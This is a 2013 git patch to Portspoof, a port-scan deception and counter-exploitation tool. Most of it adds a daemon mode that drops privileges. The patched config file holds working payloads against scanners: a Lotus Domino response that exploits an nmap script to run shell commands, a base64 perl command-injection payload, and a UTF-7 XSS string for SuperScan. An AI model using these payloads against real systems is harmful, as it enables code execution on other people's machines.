From 9765f738db3ca9eb2b696801e0d0cd6aed940780 Mon Sep 17 00:00:00 2001
From: Piotr <piotr@piotr.com>
Date: Mon, 22 Jul 2013 14:36:59 +0200
Subject: [PATCH] ready for release

---
 src/Configuration.cpp            | 32 +++++++++++-
 src/Configuration.h              | 19 ++++++--
 src/Fuzzer.h                     |  1 -
 src/Server.cpp                   | 84 ++++++++++++++++++++++++++++++++
 src/Server.h                     |  7 +++
 src/portspoof.cpp                |  4 ++
 src/revregex.cpp                 |  1 +
 system_files/init.d/portspoof.sh |  5 +-
 tools/portspoof.conf             |  4 +-
 9 files changed, 146 insertions(+), 11 deletions(-)

diff --git a/src/Configuration.cpp b/src/Configuration.cpp
index f70e7a5..d3f5e94 100755
--- a/src/Configuration.cpp
+++ b/src/Configuration.cpp
@@ -43,6 +43,9 @@ Configuration::Configuration()
 	signaturefile = std::string(SIGNATURE_FILE);
 	logfile = std::string(LOG_FILE);
 	bind_ip=std::string();
+	username=std::string(DAEMON_USER);
+	group=std::string(DAEMON_USER);
+
 	port=DEFAULT_PORT;	
 	opts=0;
 	nmapfuzzsignatures_file = std::string(NMAP_FUZZ_FILE_SIG);	
@@ -63,6 +66,7 @@ void  Configuration::usage(void)
 	"Portspoof - service signature emulator / exploitation framework.\n\n"
 	  "-i			  ip : Bind to a particular  IP address\n"
 	  "-p			  port : Bind to a particular PORT number\n"
+	  "-D			  run as daemon process\n"
 	  "-s			  file_path : Portspoof service signature regex. file\n"
 	  "-c			  file_path : Portspoof configuration file\n"
 	  "-l			  file_path : Log port scanning alerts to a file\n"
@@ -84,7 +88,7 @@ bool Configuration::processArgs(int argc, char** argv)
 	int	ch;
 	extern char *__progname;
 	
-	while ((ch = getopt(argc, argv,"l:i:p:s:c:f:n:dvh123")) != -1) {
+	while ((ch = getopt(argc, argv,"l:i:p:s:c:f:n:dvh123D")) != -1) {
 		switch (ch) {
 		case 'i':
 			this->bind_ip = std::string(optarg);
@@ -112,6 +116,9 @@ bool Configuration::processArgs(int argc, char** argv)
 		this->opts[OPT_SYSLOG_DIS]=1;
 			fprintf(stdout,"-> Syslog logging disabled.\n");
 			break;
+		case 'D':
+		this->opts[OPT_RUN_AS_D]=1;
+			break;
 		case 'l':
 		this->opts[OPT_LOG_FILE]=1;
 			this->logfile  = std::string(optarg);
@@ -214,10 +221,31 @@ unsigned short int Configuration::getPort()
 
 int Configuration::getThreadNr()
 {
-
 	return this->thread_number;
 }
 
+
+int Configuration::getUserid()
+{
+        struct passwd *pwd = getpwnam(this->username.c_str()); 
+        if(pwd) return pwd->pw_uid;
+        
+        return -1;
+}
+
+
+int Configuration::getGroupid()
+{
+        struct group *grp = getgrnam(this->group.c_str()); 
+        if(grp) return grp->gr_gid;
+
+        return -1;
+
+}
+
+
+
+
 std::vector<char> Configuration::mapPort2Signature(unsigned short port)
 {	
 	
diff --git a/src/Configuration.h b/src/Configuration.h
index 8c2ae83..b3af614 100755
--- a/src/Configuration.h
+++ b/src/Configuration.h
@@ -44,6 +44,10 @@
 #define LOG_FILE "portspoof.log"
 #define CONF_FILE "portspoof.conf"
 #define SIGNATURE_FILE "portspoof_signatures"
+
+#define DAEMON_USER "daemon"
+#define DAEMON_GROUP "daemon"
+
 #define OPT_FUZZ_WORDLIST 1
 #define OPT_IP 2
 #define OPT_PORT 3
@@ -56,14 +60,14 @@
 #define OPT_FUZZ_INTERNAL 10
 #define OPT_NOT_NMAP_SCANNER 11
 #define OPT_FUZZ_RANDOM 12
+#define OPT_RUN_AS_D 13
+
 
 #define MAX_PORTS 65535
 
-
 #include <string>
 #include <stdio.h>
 #include <ctype.h>
-#include <pcap.h>
 #include <map>
 #include <vector>
 #include <sstream>
@@ -72,6 +76,11 @@
 #include <iostream>
 #include <ctime> 
 #include <bitset>
+#include <sys/types.h>
+#include <stdio.h>
+#include <pwd.h> 
+#include <grp.h>
+#include <unistd.h>
 
 
 #include "Utils.h"
@@ -98,6 +107,9 @@ class Configuration {
 		std::string signaturefile;
 		std::string logfile;
 		std::string bind_ip;
+		std::string username;
+		std::string group;
+
 		unsigned short int port;
 		int thread_number;
 		bool fuzzing_mode;
@@ -127,7 +139,8 @@ class Configuration {
 		bool getConfigValue(int value);
 		unsigned short int getPort();
 		int getThreadNr();
-			
+		int getGroupid();
+		int getUserid();
 };
 
 
diff --git a/src/Fuzzer.h b/src/Fuzzer.h
index 652cb77..5d59d1e 100755
--- a/src/Fuzzer.h
+++ b/src/Fuzzer.h
@@ -42,7 +42,6 @@
 #include <string>
 #include <stdio.h>
 #include <ctype.h>
-#include <pcap.h>
 #include <map>
 #include <vector>
 #include <sstream>
diff --git a/src/Server.cpp b/src/Server.cpp
index 2243418..59be187 100755
--- a/src/Server.cpp
+++ b/src/Server.cpp
@@ -174,3 +174,87 @@ int Server::choose_thread()
 	
 	return min;
 }
+
+
+
+void Server::daemonize()
+{
+
+	const string &dir = "/";
+    const std::string &stdinfile = "/dev/null";
+    const std::string &stdoutfile = "/dev/null";
+    const std::string &stderrfile = "/dev/null";
+
+
+  umask(0);
+/* 
+  rlimit rl;
+  if (getrlimit(RLIMIT_NOFILE, &rl) < 0) 
+  {
+    throw std::runtime_error(strerror(errno));
+  }
+ 
+
+ 
+*/
+  
+  pid_t pid;
+  if ((pid = fork()) < 0) 
+  {
+    throw std::runtime_error(strerror(errno));
+  } else if (pid != 0) { //parent
+    exit(0);
+  }
+
+  setsid();
+ 
+  if (!dir.empty() && chdir(dir.c_str()) < 0) 
+  {
+    throw std::runtime_error(strerror(errno));
+  }
+ 
+
+   if (setgid(this->configuration->getGroupid()) != 0)
+   {
+ 	fprintf(stdout,"setgid: Unable to drop group privileges: %s", strerror(errno));
+	fflush(stdout);
+	exit(-1);
+   }
+   
+
+   if (setuid(this->configuration->getUserid()) != 0)
+   	{
+ 	fprintf(stdout,"setuid: Unable to drop user privileges: %s", strerror(errno));
+	fflush(stdout);
+	exit(-1);
+   }
+
+
+/*
+  if (rl.rlim_max == RLIM_INFINITY) 
+  {
+    rl.rlim_max = 1024;
+  }
+ 
+  for (unsigned int i = 0; i < rl.rlim_max; i++) 
+  {
+    close(i);
+  }
+ 
+ */
+
+  int fd0 = open(stdinfile.c_str(), O_RDONLY);
+  int fd1 = open(stdoutfile.c_str(),
+      O_WRONLY|O_CREAT|O_APPEND, S_IRUSR|S_IWUSR);
+  int fd2 = open(stderrfile.c_str(),
+      O_WRONLY|O_CREAT|O_APPEND, S_IRUSR|S_IWUSR);
+ 
+ /*
+  if (fd0 != STDIN_FILENO || fd1 != STDOUT_FILENO || fd2 != STDERR_FILENO) 
+  {
+    throw runtime_error("new standard file descriptors were not opened as expected");
+  }
+  */
+
+
+}
\ No newline at end of file
diff --git a/src/Server.h b/src/Server.h
index 948f2d5..04f1f63 100755
--- a/src/Server.h
+++ b/src/Server.h
@@ -42,6 +42,12 @@
 #include <sys/types.h>
 #include <sys/socket.h>
 #include <sys/ioctl.h>
+#include <sys/types.h>
+#include <stdio.h>
+#include <pwd.h>
+#include <unistd.h>
+#include <stdexcept>
+#include <sys/resource.h>
 
 #include <time.h> 
 #include "Threads.h" 
@@ -66,6 +72,7 @@ class Server{
 		Server(Configuration* configuration);
 		int choose_thread();
 		bool run();
+		void daemonize();
 };
 
 #endif
diff --git a/src/portspoof.cpp b/src/portspoof.cpp
index a8d6986..5fd6189 100755
--- a/src/portspoof.cpp
+++ b/src/portspoof.cpp
@@ -55,6 +55,10 @@ int main(int argc, char **argv)
 		exit(1);
 		
 	server = new Server(configuration);
+
+	if(configuration->getConfigValue(OPT_RUN_AS_D))
+		server->daemonize();
+
 	server->run();
 
 	return 0;
diff --git a/src/revregex.cpp b/src/revregex.cpp
index bc57d36..c142b08 100755
--- a/src/revregex.cpp
+++ b/src/revregex.cpp
@@ -33,6 +33,7 @@
  *   forward this exception.
  */
 
+// TODO: TO BE ENTIRELY REWRITTEN!
 
 #include "revregex.h"
 
diff --git a/system_files/init.d/portspoof.sh b/system_files/init.d/portspoof.sh
index 83369c8..a5df875 100644
--- a/system_files/init.d/portspoof.sh
+++ b/system_files/init.d/portspoof.sh
@@ -1,13 +1,12 @@
 #!/bin/sh
-# Starts and stops Portspoof
+# Starts and stops Portspoof daemon
 #
 
-
 case "$1" in
 start)
 	
              if !  pidof portspoof >/dev/null; then
-                   /usr/local/bin/portspoof -c /usr/local/etc/portspoof.conf -s /usr/local/etc/portspoof_signatures 
+                   /usr/local/bin/portspoof -D -c /usr/local/etc/portspoof.conf -s /usr/local/etc/portspoof_signatures 
                    echo "Starting Portspoof..."
              else
                     echo "Portspoof already running.."
diff --git a/tools/portspoof.conf b/tools/portspoof.conf
index cb7dfd3..9b1d95d 100755
--- a/tools/portspoof.conf
+++ b/tools/portspoof.conf
@@ -96,10 +96,10 @@
 # NMAP 
 # nmap --script http-domino-enum-passwords.nse -p 80 172.16.37.145  -sC -PN -n --script-args domino-enum-passwords.username='xxx',domino-enum-passwords.password='secr',domino-enum-passwords.idpath='/tmp/'  -d4
 
-80 "HTTP/1\.0 200 OK\r\nServer: Apache/(IBM_Lotus_Domino_v\.6\.5\.\d)\r\n\r\n--<html>\r\n--<body><a href=\x22user-UserID\x22>\r\n--<input name=\x22HTTPPassword\x22  value=\x22PPASSS\x22>\r\n--<input name=\x22FullName\x22 value=\x22\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2fusr\x2flocal\x2fshare\x2fnmap\x2fscripts\x2fhttp-domino-enum-passwords\x2ense\x00\x61\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x25\x64\x0d\x0a--\x22>\r\n\r\n--<a href=\x22\%?OpenDocumentddddd\x22>\r\n--<form action=\x22aaa?ReadForm&\x22>\r\n--</body>\r\n--</html>\r\nos\x2eexecute\x28\x22echo 'You have been PWNed';whoami; uname -a\x22\x29;\x0d\x0a\x0d\x0a"
+80 "HTTP/1\.0 200 OK\r\nServer: Apache/(IBM_Lotus_Domino_v\.6\.5\.\d)\r\n\r\n--<html>\r\n--<body><a href=\x22user-UserID\x22>\r\n--<input name=\x22HTTPPassword\x22  value=\x22PPASSS\x22>\r\n--<input name=\x22FullName\x22 value=\x22\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2fusr\x2flocal\x2fshare\x2fnmap\x2fscripts\x2fhttp-domino-enum-passwords\x2ense\x00\x61\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x25\x64\x0d\x0a--\x22>\r\n\r\n--<a href=\x22\%?OpenDocumentddddd\x22>\r\n--<form action=\x22aaa?ReadForm&\x22>\r\n--</body>\r\n--</html>\r\nos\x2eexecute\x28\x22echo 'You have been PWNed';whoami; uname -a\x22\x29;\x0d\x0a\x0d\x0a"	
 
 #OS cmd injection payload for bash: $(cat output) and `cat output` injections
-9090 "/bin/bash\t-c\t{perl,-e,$0,useSPACEMIME::Base64,cHJpbnQgIlBXTkVEXG4iIHggNSA7ICRfPWBwd2RgOyBwcmludCAiXG51cGxvYWRpbmcgeW91ciBob21lIGRpcmVjdG9yeTogIiwkXywiLi4uIFxuXG4iOw==}\t$_=$ARGV[0];~s/SPACE/\t/ig;eval;$_=$ARGV[1];eval(decode_base64($_));"
+8080 "/bin/bash\t-c\t{perl,-e,$0,useSPACEMIME::Base64,cHJpbnQgIlBXTkVEXG4iIHggNSA7ICRfPWBwd2RgOyBwcmludCAiXG51cGxvYWRpbmcgeW91ciBob21lIGRpcmVjdG9yeTogIiwkXywiLi4uIFxuXG4iOw==}\t$_=$ARGV\x5b0\x5d;~s/SPACE/\x5ct/ig;eval;$_=$ARGV\x5b1\x5d;eval\x28decode_base64\x28$_\x29\x29;"
 
 #McAffe SuperScan UTF7 XSS payload
 1010 "+ADw-img src=x onerror='a setter=alert,a=\x22UTF-7-XSS\x22;'+AD4-"